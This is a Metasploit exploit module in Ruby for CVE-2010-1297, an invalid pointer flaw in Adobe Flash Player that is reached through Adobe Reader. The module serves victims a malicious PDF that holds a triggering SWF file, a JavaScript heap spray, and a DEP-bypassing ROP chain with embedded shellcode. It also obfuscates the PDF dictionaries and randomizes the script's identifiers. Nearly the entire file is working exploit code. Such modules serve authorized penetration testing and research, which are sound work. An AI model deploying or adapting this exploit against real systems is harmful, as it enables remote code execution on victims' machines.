GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/adobe_flashplayer_newfunction.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
# Framework reliability ranking for this module.
Rank = NormalRanking

# HTTP server mixin. The request hook (on_request_uri), send_response, handler
# and the `super` call in exploit below presumably come from this mixin --
# confirm against Msf::Exploit::Remote::HttpServer::HTML.
include Msf::Exploit::Remote::HttpServer::HTML
# Registers the module metadata with the framework: name, description,
# references, default options, payload constraints, platform and targets.
#
# @param info [Hash] module info supplied by the framework, merged via update_info
def initialize(info = {})
  details = {
    'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
    'Description' => %q{
      This module exploits a vulnerability in the DoABC tag handling within
      versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
      vulnerable, as are any other applications that may embed Flash player.

      Arbitrary code execution is achieved by embedding a specially crafted Flash
      movie into a PDF document. An AcroJS heap spray is used in order to ensure
      that the memory used by the invalid pointer issue is controlled.

      NOTE: This module uses a similar DEP bypass method to that used within the
      adobe_libtiff module. This method is unlikely to work across various
      Windows versions due a hardcoded syscall number.
    },
    'License' => MSF_LICENSE,
    'Author' => [
      'Unknown', # Found being openly exploited
      'jduck'    # Metasploit version
    ],
    'References' => [
      ['CVE', '2010-1297'],
      ['OSVDB', '65141'],
      ['BID', '40586'],
      ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
      # For SWF->PDF embedding
      ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
    ],
    'DefaultOptions' => {
      'EXITFUNC' => 'process',
      'HTTP::compression' => 'gzip',
      'HTTP::chunked' => true,
      'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
    },
    'Payload' => {
      'Space' => 1000,
      'BadChars' => "\x00",
      'DisableNops' => true
    },
    'Platform' => 'win',
    'Targets' => [
      # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
      # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
      # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
      ['Automatic', {}]
    ],
    'DisclosureDate' => '2010-06-04',
    'DefaultTarget' => 0
  }

  super(update_info(info, details))
end
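# Loads the static SWF that triggers the vulnerability into @swf_data (used by
# on_request_uri for every response), then defers to the mixin's exploit via
# super.
#
# @raise [Errno::ENOENT] if the data file is not present in the data directory
def exploit
  # load the static swf file; File.binread reads the whole file in binary mode
  # and always closes it -- the previous open/read/close sequence leaked the
  # handle if the read raised
  path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")
  @swf_data = File.binread(path)

  super
end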
# Serves the exploit document to one client. Presumably invoked by the
# HttpServer mixin per request; the request itself is not inspected. The
# response is generated fresh each time: the payload is re-encoded for this
# client, wrapped in the spray script and then in the PDF.
#
# @param cli the connected client, passed through to send_response and handler
# @param request the HTTP request (unused)
def on_request_uri(cli, request)
  print_status("Sending crafted PDF w/SWF")

  headers = { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }
  spray_js = make_js(regenerate_payload(cli).encoded)
  document = make_pdf(@swf_data, spray_js)
  send_response(cli, document, headers)

  # Handle the payload
  handler(cli)
end
# Builds the JavaScript that the PDF's OpenAction runs (see make_pdf). The
# script unescapes stack_data (the chain below) followed by encoded_payload
# into one string, embeds that string in a block of var_s/2 characters, doubles
# the block until it is 0x80000 characters long and stores 0x1f0 copies of it
# in an array -- the AcroJS heap spray referred to in the module description.
# Every identifier in the emitted script is randomized per call.
#
# @param encoded_payload [String] the encoded payload, appended directly after stack_data
# @return [String] JavaScript source
def make_js(encoded_payload)

  # The following executes a ret2lib using BIB.dll
  # The effect is to bypass DEP and execute the shellcode in an indirect way
  stack_data = [
    0xc0c0c0c,
    0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
    0xcccccccc,
    0x70048ef, # xchg eax,esp / ret
    0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
    0xcccccccc,
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009033, # ret 0x18
    0x7009084, # ret
    0xc0c0c0c,
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7009084, # ret
    0x7001599, # pop ebp / ret
    0x10124,
    0x70072f7, # pop eax / ret
    0x10104,
    0x70015bb, # pop ecx / ret
    0x1000,
    0x700154d, # mov [eax], ecx / ret
    0x70015bb, # pop ecx / ret
    0x7ffe0300, # -- location of KiFastSystemCall
    0x7007fb2, # mov eax, [ecx] / ret
    0x70015bb, # pop ecx / ret
    0x10011,
    0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
    0x70015bb, # pop ecx / ret
    0x10100,
    0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
    0x70072f7, # pop eax / ret
    0x10011,
    0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
    0x7005c54, # pop esi / add esp,0x14 / ret
    0xffffffff,
    0x10100,
    0x0,
    0x10104,
    0x1000,
    0x40,
    # The next bit effectively copies data from the interleaved stack to the memory
    # pointed to by eax
    # The data copied is:
    # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
    # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
    # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
    0x700d731, # mov eax, [ebp-0x24] / ret
    0x70015bb, # pop ecx / ret
    0x9054905a,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x5815eb5a,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x18891a8b,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x8304c083,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0xfb8104c2,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0xc0c0c0c,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x5ebee75,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0xffffe6e8,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x909090ff,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x90909090,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x90909090,
    0x700154d, # mov [eax], ecx / ret
    0x700a722, # add eax, 4 / ret
    0x70015bb, # pop ecx / ret
    0x90ffffff,
    0x700154d, # mov [eax], ecx / ret
    0x700d731, # mov eax, [ebp-0x24] / ret
    0x700112f # call eax -- (execute stub to transition to full shellcode)
  ].pack('V*')

  # randomized identifier names so the emitted script differs per response
  var_unescape = rand_text_alpha(rand(100) + 1)
  var_shellcode = rand_text_alpha(rand(100) + 1)

  var_start = rand_text_alpha(rand(100) + 1)

  # size bound (in bytes) used when growing var_c and trimming var_d below
  var_s = 0x10000
  var_c = rand_text_alpha(rand(100) + 1)
  var_b = rand_text_alpha(rand(100) + 1)
  var_d = rand_text_alpha(rand(100) + 1)
  var_3 = rand_text_alpha(rand(100) + 1)
  var_i = rand_text_alpha(rand(100) + 1)
  var_4 = rand_text_alpha(rand(100) + 1)

  # stack data first, then the encoded payload immediately after it
  payload_buf = ''
  payload_buf << stack_data
  payload_buf << encoded_payload

  escaped_payload = Rex::Text.to_unescape(payload_buf)

  js = %Q|
    var #{var_unescape} = unescape;
    var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
    var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
    while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
    #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
    #{var_b} += #{var_shellcode};
    #{var_b} += #{var_c};
    #{var_d} = #{var_b}.substring(0, #{var_s}/2);
    while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
    #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
    var #{var_4} = new Array();
    for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
  |

  js
end
# Returns a string of `count` random bytes, each in the range 128..255.
# Currently only referenced from a commented-out line in make_pdf.
#
# @param count [Integer] number of bytes to generate
# @return [String] the random high-byte string (empty when count <= 0)
def random_non_ascii_string(count)
  count.times.map { (rand(128) + 128).chr }.join
end
# Header line for PDF object `id` (generation 0), newline included.
#
# @param id [Integer] object number
# @return [String] e.g. "5 0 obj\n"
def io_def(id)
  format("%d 0 obj\n", id)
end
# Indirect reference to PDF object `id` (generation 0).
#
# @param id [Integer] object number
# @return [String] e.g. "5 0 R"
def io_ref(id)
  format('%d 0 R', id)
end
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
# Rewrites roughly half of the letters in a PDF dictionary string using the
# #xx hex-escape form that PDF names accept, so the same dictionary reads
# differently on each request. Only characters matched by /./u are kept:
# '.' does not match a newline, so newlines would be dropped (no caller here
# passes any).
#
# @param str [String] PDF dictionary text
# @return [String] the text with a random subset of its letters hex-escaped
def n_obfu(str)
  letters = 'A'..'Z'
  str.scan(/./u).each_with_object(+"") do |ch, out|
    # rand first, so upcase is only evaluated for the characters we may escape
    escape = rand(2).zero? && letters.cover?(ch.upcase)
    out << (escape ? format("#%x", ch.unpack("C*")[0]) : ch)
  end
end
# ASCIIHex-encodes `str` with one to three random spaces between consecutive
# byte pairs (none before the first) and the ">" end-of-data marker appended.
#
# @param str [String] raw bytes to encode
# @return [String] hex text ending in ">" (just ">" for an empty input)
def ascii_hex_whitespace_encode(str)
  hex_bytes = str.each_byte.map { |byte| format('%02x', byte) }
  encoded = hex_bytes.each_with_index.map do |hex, idx|
    idx.zero? ? hex : (" " * (rand(3) + 1)) << hex
  end.join
  encoded << ">"
end
# Assembles the PDF that carries the exploit: a single page whose catalog
# /OpenAction points at a JavaScript action (the script from make_js, stored
# ASCIIHex- then Flate-encoded) and whose only annotation is a RichMedia
# Flash instance whose asset is the embedded SWF. Dictionaries are passed
# through n_obfu so their spelling varies between requests; the xref table
# is built from the offsets recorded as each object is appended.
#
# @param swf [String] SWF bytes, written unchanged into an EmbeddedFile stream
# @param js [String] JavaScript source for the OpenAction
# @return [String] the complete PDF
def make_pdf(swf, js)

  swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

  xref = []   # offset of each object, in the order the objects are written
  eol = "\n"
  endobj = "endobj" << eol

  # Randomize PDF version?
  pdf = "%PDF-1.5" << eol
  #pdf << "%" << random_non_ascii_string(4) << eol

  # NOTE: offsets are taken with String#length (characters, not bytes). Everything
  # appended before the first binary stream is ASCII, and appending the binary
  # `compressed` data should switch the buffer to ASCII-8BIT, so length and byte
  # offset agree here -- switch to bytesize if non-ASCII text is ever appended.
  # catalog
  xref << pdf.length
  pdf << io_def(1) << n_obfu("<</Type/Catalog")
  pdf << n_obfu("/Pages ") << io_ref(3)
  pdf << n_obfu("/OpenAction ") << io_ref(5)
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # pages array (object 2 is never emitted; see the xref note below)
  xref << pdf.length
  pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

  # page 1
  xref << pdf.length
  pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
  pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # js action
  xref << pdf.length
  pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj

  # js stream: hex-encoded first, then deflated, so the reader applies
  # FlateDecode and then ASCIIHexDecode (the filter order declared below)
  xref << pdf.length
  compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
  pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
  pdf << "stream" << eol
  pdf << compressed << eol
  pdf << "endstream" << eol
  pdf << endobj

  # swf annotation object
  xref << pdf.length
  pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
  pdf << n_obfu("/Rect [20 20 187 69] ")
  pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
  pdf << n_obfu("/RichMediaContent ") << io_ref(9)
  pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # rich media settings
  xref << pdf.length
  pdf << io_def(8)
  pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
  pdf << n_obfu("/Activation ") << io_ref(10)
  pdf << n_obfu("/Deactivation ") << io_ref(11)
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # rich media content
  xref << pdf.length
  pdf << io_def(9)
  pdf << n_obfu("<</Type/RichMediaContent")
  pdf << n_obfu("/Assets ") << io_ref(12)
  pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # rich media activation / deactivation
  xref << pdf.length
  pdf << io_def(10)
  pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
  pdf << eol << endobj

  xref << pdf.length
  pdf << io_def(11)
  pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
  pdf << eol << endobj

  # rich media assets
  xref << pdf.length
  pdf << io_def(12)
  pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
  pdf << eol << endobj

  # swf embedded file ref
  xref << pdf.length
  pdf << io_def(13)
  pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
  pdf << eol << endobj

  # rich media configuration
  xref << pdf.length
  pdf << io_def(14)
  pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
  pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
  pdf << eol << endobj

  # rich media instance
  xref << pdf.length
  pdf << io_def(15)
  pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
  pdf << n_obfu("/Asset ") << io_ref(13)
  pdf << n_obfu(">>")
  pdf << eol << endobj

  # swf stream
  # NOTE: This data is already compressed, no need to compress it again...
  xref << pdf.length
  pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
  pdf << "stream" << eol
  pdf << swf << eol
  pdf << "endstream" << eol
  pdf << endobj

  # trailing stuff
  # NOTE: xref holds 15 offsets for objects 1,3,4,...,16, but the subsection
  # below declares entries 0..15 consecutively, so from entry 2 onwards each
  # entry carries the offset of the *next* object and object 16 has none. A
  # reader that trusts the table would resolve the wrong objects; this
  # presumably works only because the reader rebuilds a broken xref.
  xrefPosition = pdf.length
  pdf << "xref" << eol
  pdf << "0 %d" % (xref.length + 1) << eol
  pdf << "0000000000 65535 f" << eol
  xref.each do |index|
    pdf << "%010d 00000 n" % index << eol
  end

  pdf << "trailer" << eol
  pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

  pdf << "startxref" << eol
  pdf << xrefPosition.to_s() << eol

  pdf << "%%EOF" << eol
  pdf
end
end